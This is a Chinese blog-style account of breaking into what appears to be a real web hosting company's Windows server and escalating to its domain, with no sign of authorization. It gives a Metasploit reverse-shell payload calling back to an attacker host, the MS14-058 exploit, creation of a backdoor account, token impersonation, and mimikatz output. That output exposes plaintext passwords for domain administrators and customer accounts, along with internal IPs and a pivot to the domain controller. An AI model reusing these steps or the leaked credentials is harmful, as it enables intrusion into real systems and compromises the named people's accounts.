0x01 前言
Date/time:2014年,这个网站权限是朋友给我的,叫帮忙给看下提权,没去细看他是通过什么漏洞拿到的这个网站权限。在拿到权限以后大致看了下:wscript.shell组件没被禁用,可直接执行系统命令,支持Aspx脚本,系统补丁658+,不允许跨站,搜集到的目标基本信息如下。
基本信息探测:
端口开放:21、80、135、443、445、3306、3392 补丁情况:658+补丁( Win2003 32位系统 ) 脚本探测:支持Asp,Aspx脚本,不支持Php脚本 磁盘权限:C,D盘部分文件夹有可读/写权限(不允许跨站)
注:除了MySQL没有其他可利用第三方软件,因为安全权限设置的原因也不能跨到MySQL目录,所以暂时无法利用MySQL UDF进行提权。
0x02 实战测试过程
补丁打了600+,明知道成功机率不大,但还是硬着头皮把常用的和以前测试成功过的提权EXP全传上去试了个遍,有一部分提权EXP还没来得及整理编号。
pr.exe,Churrasco.exe,2003.exe,NDProxy.exe,iis6.exe,MS11-046.exe,MS10-048.exe,MS11-080.exe,MS13-051.exe,debug.exe
除了最后测试的MS14-058.exe成功,其它全都失败了,虽然MS14-058成功利用,但是在测试中发现只能执行whoami,其它命令或者.bat、.vbs等文件在执行后都没有回显。
正是因为如此,我们不得不尝试使用Metasploit进行提权,否则还真没有什么提权思路了。生成个攻击载荷(Msf基础知识在前面已经讲了很多了,不再重复讲了),反弹得到Meterpreter会话。
root@c2unix:~# msfpayload windows/meterpreter/reverse_tcp LHOST=1x3.2x1.x0.1x8 LPORT=443 R | msfencode -t aspx -o /media/sf_Temp/test.aspx
root@c2unix:~# msfconsole -q msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.10 msf exploit(handler) > set lport 443 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.10:443 [*] Starting the payload handler... [*] Sending stage (770048 bytes) to 216.**.***.9 [*] Meterpreter session 1 opened (192.168.1.10:443 -> 216.**.***.9:2159) at 2014-12-29 04:11:44 +0800
查看当前会话权限、系统信息,尝试使用getsystem提权,没有成功,将当前会话放置后台运行,继续加载ms14_058_track_popup_menu提权模块进行测试。
meterpreter > getuid Server username: TRESSA\IWPD_194(lobom0) meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. meterpreter > sysinfo Computer : TRESSA OS : Windows .NET Server (Build 3790, Service Pack 2). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > background [*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu msf exploit(ms14_058_track_popup_menu) > set payload windows/meterpreter/reverse_tcp msf exploit(ms14_058_track_popup_menu) > set lhost 1x3.2x1.x0.1x8 msf exploit(ms14_058_track_popup_menu) > set lport 443 msf exploit(ms14_058_track_popup_menu) > set session 1 msf exploit(ms14_058_track_popup_menu) > exploit [-] Handler failed to bind to 1x3.2x1.x0.1x8:443 [*] Started reverse handler on 0.0.0.0:443 [*] Launching notepad to host the exploit... [+] Process 84492 launched. [*] Reflectively injecting the exploit DLL into 84492... [*] Injecting exploit into 84492... [*] Exploit injected. Injecting payload into 84492... [*] Payload injected. Executing exploit... [*] Sending stage (770048 bytes) to 216.**.***.9 [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Meterpreter session 2 opened (192.168.1.10:443 -> 216.**.***.9:3037) at 2014-12-29 04:16:29 +0800
注:如果该提权模块显示利用成功,但并没有得到Metpreter会话,这可能是因为目标服务器上安装了诸如安全狗、麦咖啡或者什么其它的安全防护软件,以前多次遇到过这种情况,缺图。
msf exploit(ms14_058_track_popup_menu) > exploit [-] Handler failed to bind to 1x3.2x1.x0.1x8:443 [*] Started reverse handler on 0.0.0.0:443 [*] Launching notepad to host the exploit... [+] Process 84492 launched. [*] Reflectively injecting the exploit DLL into 84492... [*] Injecting exploit into 84492... [*] Exploit injected. Injecting payload into 84492... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Exploit completed, but no session was created
再次通过getuid命令查询当前权限时发现已经是“NT AUTHORITY\SYSTEM”权限了,然后将当前会话进程迁移至PID为2796进程中,缺图。
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > ps PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- ... 2796 580 searchindexer.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\SearchIndexer.exe 67360 40764 notepad.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\notepad.exe ... meterpreter > migrate 2796 [*] Migrating from 67360 to 2796... [*] Migration completed successfully.
使用ipconfig命令查看当前目标主机上的IP信息时发现有两张网卡,一个是172.16.19.152内网的,一个是多IP(216.**.***.9/64.**.***.229/209.200.***.***)公网的,缺图。
meterpreter > ipconfig Interface 1 ============ Name : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00:00 MTU : 1520 IPv4 Address : 127.0.0.1 Interface 65539 ============ Name : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2 - Packet Scheduler Miniport Hardware MAC : 84:2b:2b:6b:45:11 MTU : 1500 IPv4 Address : 172.16.19.152 IPv4 Netmask : 255.255.252.0 Interface 65540 ============ Name : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #3 - Packet Scheduler Miniport Hardware MAC : 84:2b:2b:6b:45:0f MTU : 1500 IPv4 Address : 216.***.***.9 IPv4 Netmask : 255.255.255.0 IPv4 Address : 64.**.***.229 IPv4 Netmask : 255.255.255.0 IPv4 Address : 209.200.***.*** IPv4 Netmask : 255.255.255.0 IPv4 Address : 209.200.***.*** IPv4 Netmask : 255.255.255.0 IPv4 Address : 209.200.***.*** IPv4 Netmask : 255.255.255.0 IPv4 Address : 216.**.***.113 IPv4 Netmask : 255.255.255.0 IPv4 Address : 209.200.***.*** IPv4 Netmask : 255.255.255.0 IPv4 Address : 209.200.***.*** IPv4 Netmask : 255.255.255.0
这里我们先用Metasploit中的enable_support_account模块在系统中留一个后门帐户,也可以用hashdump、mimikatz等命令获取目标主机的哈希和明文密码,缺图。
- User:SUPPORT_388945a0
- Pass:7a57a5a743894a0e
msf exploit(ms14_058_track_popup_menu) > use post/windows/manage/enable_support_account msf post(enable_support_account) > set password 7a57a5a743894a0e msf post(enable_support_account) > set session 2 msf post(enable_support_account) > exploit [*] Target OS is Windows .NET Server (Build 3790, Service Pack 2). [*] Harvesting users... [+] Found SUPPORT_388945a0 account! [*] Target RID is 1004 [*] Account is disabled, activating... [*] Swapping RIDs...! [*] Setting password to 7a57a5a743894a0e [*] Post module execution completed
用于远程桌面连接的3389端口被管理员修改过了,根据经验猜测3392应该是修改后的端口号,在远程连接界面看到存在域,说明这台机器在HOSTING域内。
Webshell执行域信息搜集相关命令时会提示:System error 5 has occurred . Access is denied . 。访问被拒绝,权限问题。
ipconfig /all //网卡配置信息,所属域以及IP段 ping backbox //显示该机器名的IP net view //显示当前域中的计算机列表 net view /domain //查看有多少个域 net user /domain //获取所有域用户列表 net group /domain //获取域用户组信息 net group "domain admins" /domain //获取当前域管理员 net time /domain //域服务器一般也做时间服务器 dsquery server //查看域控服务器 dsquery subnet //查看域IP地址范围
因为meterpreter会话2里已经是SYSTEM权限了,所以可以用shell命令进入DOS命令行下执行以下命令搜集域信息,缺图。
msf post(enable_support_account) > sessions -i 2 [*] Starting interaction with 2... meterpreter > shell Process 13204 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>net group "domain admins" /domain net group "domain admins" /domain The request will be processed at a domain controller for domain hosting.lunarpages.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- _new_win_user abbas.khan akumar alexb alext brianl dgreathouse dimitriosk epak gcager gudiyak iismon Jassi jayraju jmickle lunarscripts mike mwaqas richardd robotdoggy rodb Tsinternetuser vartamonov vlaszlo zafril The command completed successfully.
使用dsquery server命令查询域控制器中有一个PHART,在域信息搜集时也发现HOSTING域内有一台计算机名为PHART的机器,所以这台机器应该是域控服务器,对应的IP地址为:172.16.17.208。
c:\windows\system32\inetsrv>dsquery server "CN=THART,CN=Servers,CN=Sandiego,CN=Sites,CN=Configuration,DC=hosting,DC=lunarpages,DC=com" "CN=PHART,CN=Servers,CN=Sandiego,CN=Sites,CN=Configuration,DC=hosting,DC=lunarpages,DC=com"
====== Domain:HOSTING(域内机器)======
\\ARCTURUS = [172.16.17.176] \\BASH = [172.16.17.197] \\BLAMO = [172.16.17.112] \\CASTOR = [172.16.19.62] \\CELANEO = [172.16.17.221] \\CEPHEI = [172.16.17.177] \\INDUS = [172.16.18.30] \\KENDAL-NEW = [172.16.16.55] \\KRAZ = [216.***.***.207] \\PHART = [172.16.17.208] \\RAPTOR = [172.16.17.199] \\REGOR = [216.***.***.206] \\ROCKET = [172.16.16.120] \\SM-MAIL2-N14 = [172.16.19.129] \\SMARTERMAIL1 = [172.16.16.129] \\TRESSA = [216.**.***.9] \\TUB = [172.16.19.72] \\VOGA = [67.***.***.33] \\VPSSQL12 = [172.16.18.169] \\YED = [216.***.***.203]
加载incognito扩展,它可以用来盗窃目标主机令牌和假冒用户,列出目标主机可用令牌,可以看到有2个域管帐号:HOSTING\dimitriosk,HOSTING\richardd。
meterpreter > use incognito iLoading extension incognito...success. meterpreter > list_tokens -u Delegation Tokens Available ======================================== NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM TRESSA\codeb7 TRESSA\IWAM_plesk(default) TRESSA\IWPC_10(techb7) TRESSA\IWPC_112(techn56) TRESSA\IWPC_120(csbelts2) ...... Impersonation Tokens Available ======================================== HOSTING\dimitriosk HOSTING\richardd NT AUTHORITY\ANONYMOUS LOGON TRESSA\IUSR_baffledcomics23 TRESSA\IUSR_bridgca TRESSA\IUSR_canva4 TRESSA\IUSR_cellu12 ......
接着我们使用mimikatz法国神器直接就能获取到了这2个域管帐号的明文密码,缺图。
meterpreter > wdigest [+] Running as SYSTEM [*] Retrieving wdigest credentials wdigest credentials =================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;54487 NTLM 0;141544 NTLM TRESSA IWPD_323(jielu0) 1pDH4 0;146820 NTLM TRESSA IWPD_276(codeb7) 2FRj# 0;150429 NTLM TRESSA psaadm 2a 00 6d 00 48 00 6a 00 40 bc 0;146362 NTLM TRESSA IWPD_73(birch11) 2a)hx 0;145281 NTLM TRESSA IWPD_404(apsns0) 2i!@! 0;999 Negotiate HOSTING TRESSA$ 37 9f 4f db ad 52 cf a4 1b 0e f7 c0 33 ad 6c 6a f9 5a 21 aa 57 e3 33 42 b7 2a b3 52 0;996 Negotiate NT AUTHORITY NETWORK SERVICE 37 9f 4f db ad 52 cf a4 1b 0e f7 c0 33 ad 6c 6a f9 5a 21 aa 57 e3 33 42 b7 2a b3 52 0;143168 NTLM TRESSA IWPD_130(leopo1) A^Xku 0;150476 NTLM TRESSA IWPD_390(myp3n0) AehD8 0;50614744 Kerberos HOSTING richardd B0unc3d 0;87605279 Kerberos HOSTING richardd B0unc3d 0;143575 NTLM TRESSA IWPD_231(rmhar0) BARrc 0;150196 NTLM TRESSA IWPC_184(e2esoft0) C9rFi 0;1669440 NTLM TRESSA Plesk Administrator HOB.5Sd3X88C610rxYL/06.U0UbihUoU 0;148004 NTLM TRESSA IWPD_413(manuf5) I1)cd 0;147957 NTLM TRESSA IWPD_375(cellu12) I6oS) 0;63839802 Kerberos HOSTING dimitriosk TsAk1553!@# 0;56964817 Kerberos HOSTING dimitriosk TsAk1553!@# 0;143880 NTLM TRESSA IWPD_179(ringb2) U&RQo 0;144397 NTLM TRESSA IWPD_427(temp02) Uj$Da 0;49263709 NTLM TRESSA SvcCWRSYNC XgXS0fJkki1120 0;49609545 NTLM TRESSA SvcCWRSYNC XgXS0fJkki1120 0;147191 NTLM TRESSA IWPD_334(egorov0) agA+L 0;147850 NTLM TRESSA IWPD_399(smash11) btj#c 0;82470376 NTLM TRESSA codeb7 codebroker1 0;145375 NTLM TRESSA IWPD_48(obser14) d(nlK 0;144068 NTLM TRESSA IWPD_302(donas0) d-1!j 0;56760168 NTLM TRESSA robotdoggy xhn?O8kx!K 0;87616530 NTLM TRESSA robotdoggy xhn?O8kx!K 0;149472 NTLM TRESSA IWPD_290(expos12) xula) 0;147761 NTLM TRESSA IWPD_417(marig4) yy=^( ......
域控服务器的IP地址、帐号密码都到手了,接下来就是使用meterpreter的portfwd命令进行端口转发并连接进入域控服务器就行了,域控服务器的远程桌面连接端口也改为了3392。
这里笔者在测试时是可以成功登录到域控服务器及域控下的所有机器,这里就不再截图了。
meterpreter > portfwd add -l 1234 -r 172.16.17.208 -p 3392 [*] Local TCP relay created: 0.0.0.0:1234 <-> 172.16.17.208:3392 meterpreter > portfwd delete -l 1234 //删除
0x03 一处问题测试
原笔者想直接通过Metasploit下的exploit/windows/smb/psexec模块使用其中一个域管理员进行批量登录测试的,但是在测试过程中发现总是会出现 以下报错信息。
msf exploit(psexec) > exploit [*] Started reverse handler on 192.168.1.10:443 [*] Connecting to the server... [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (172.16.17.208:445).
通过在本地2008虚拟机中测试发现,开启Windows防火墙时使用psexec模块返回的就是这个报错。用DOS命令(net stop "Windows Firewall")停止防火墙服务依旧提示一样的报错,但将Windows防火墙关闭后即可成功得到会话,重新启用防火墙后又会断开会话 ~.~ 。
msf exploit(handler) > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/bind_tcp msf exploit(psexec) > set SMBUSER administrator msf exploit(psexec) > set SMBPASS windows****!@#123 msf exploit(psexec) > set RHOST 192.168.1.9 msf exploit(psexec) > set LPORT 4444 msf exploit(psexec) > exploit [*] Started bind handler [*] Connecting to the server... [*] Authenticating to 192.168.1.9:445|WORKGROUP as user 'administrator'... [*] Uploading payload... [*] Created \TFPRuonH.exe... [+] 192.168.1.9:445 - Service started successfully... [*] Deleting \TFPRuonH.exe... [*] Sending stage (770048 bytes) to 192.168.1.9 [*] Meterpreter session 6 opened (192.168.1.10:60880 -> 192.168.1.9:4444) at 2014-12-29 20:12:56 +0800
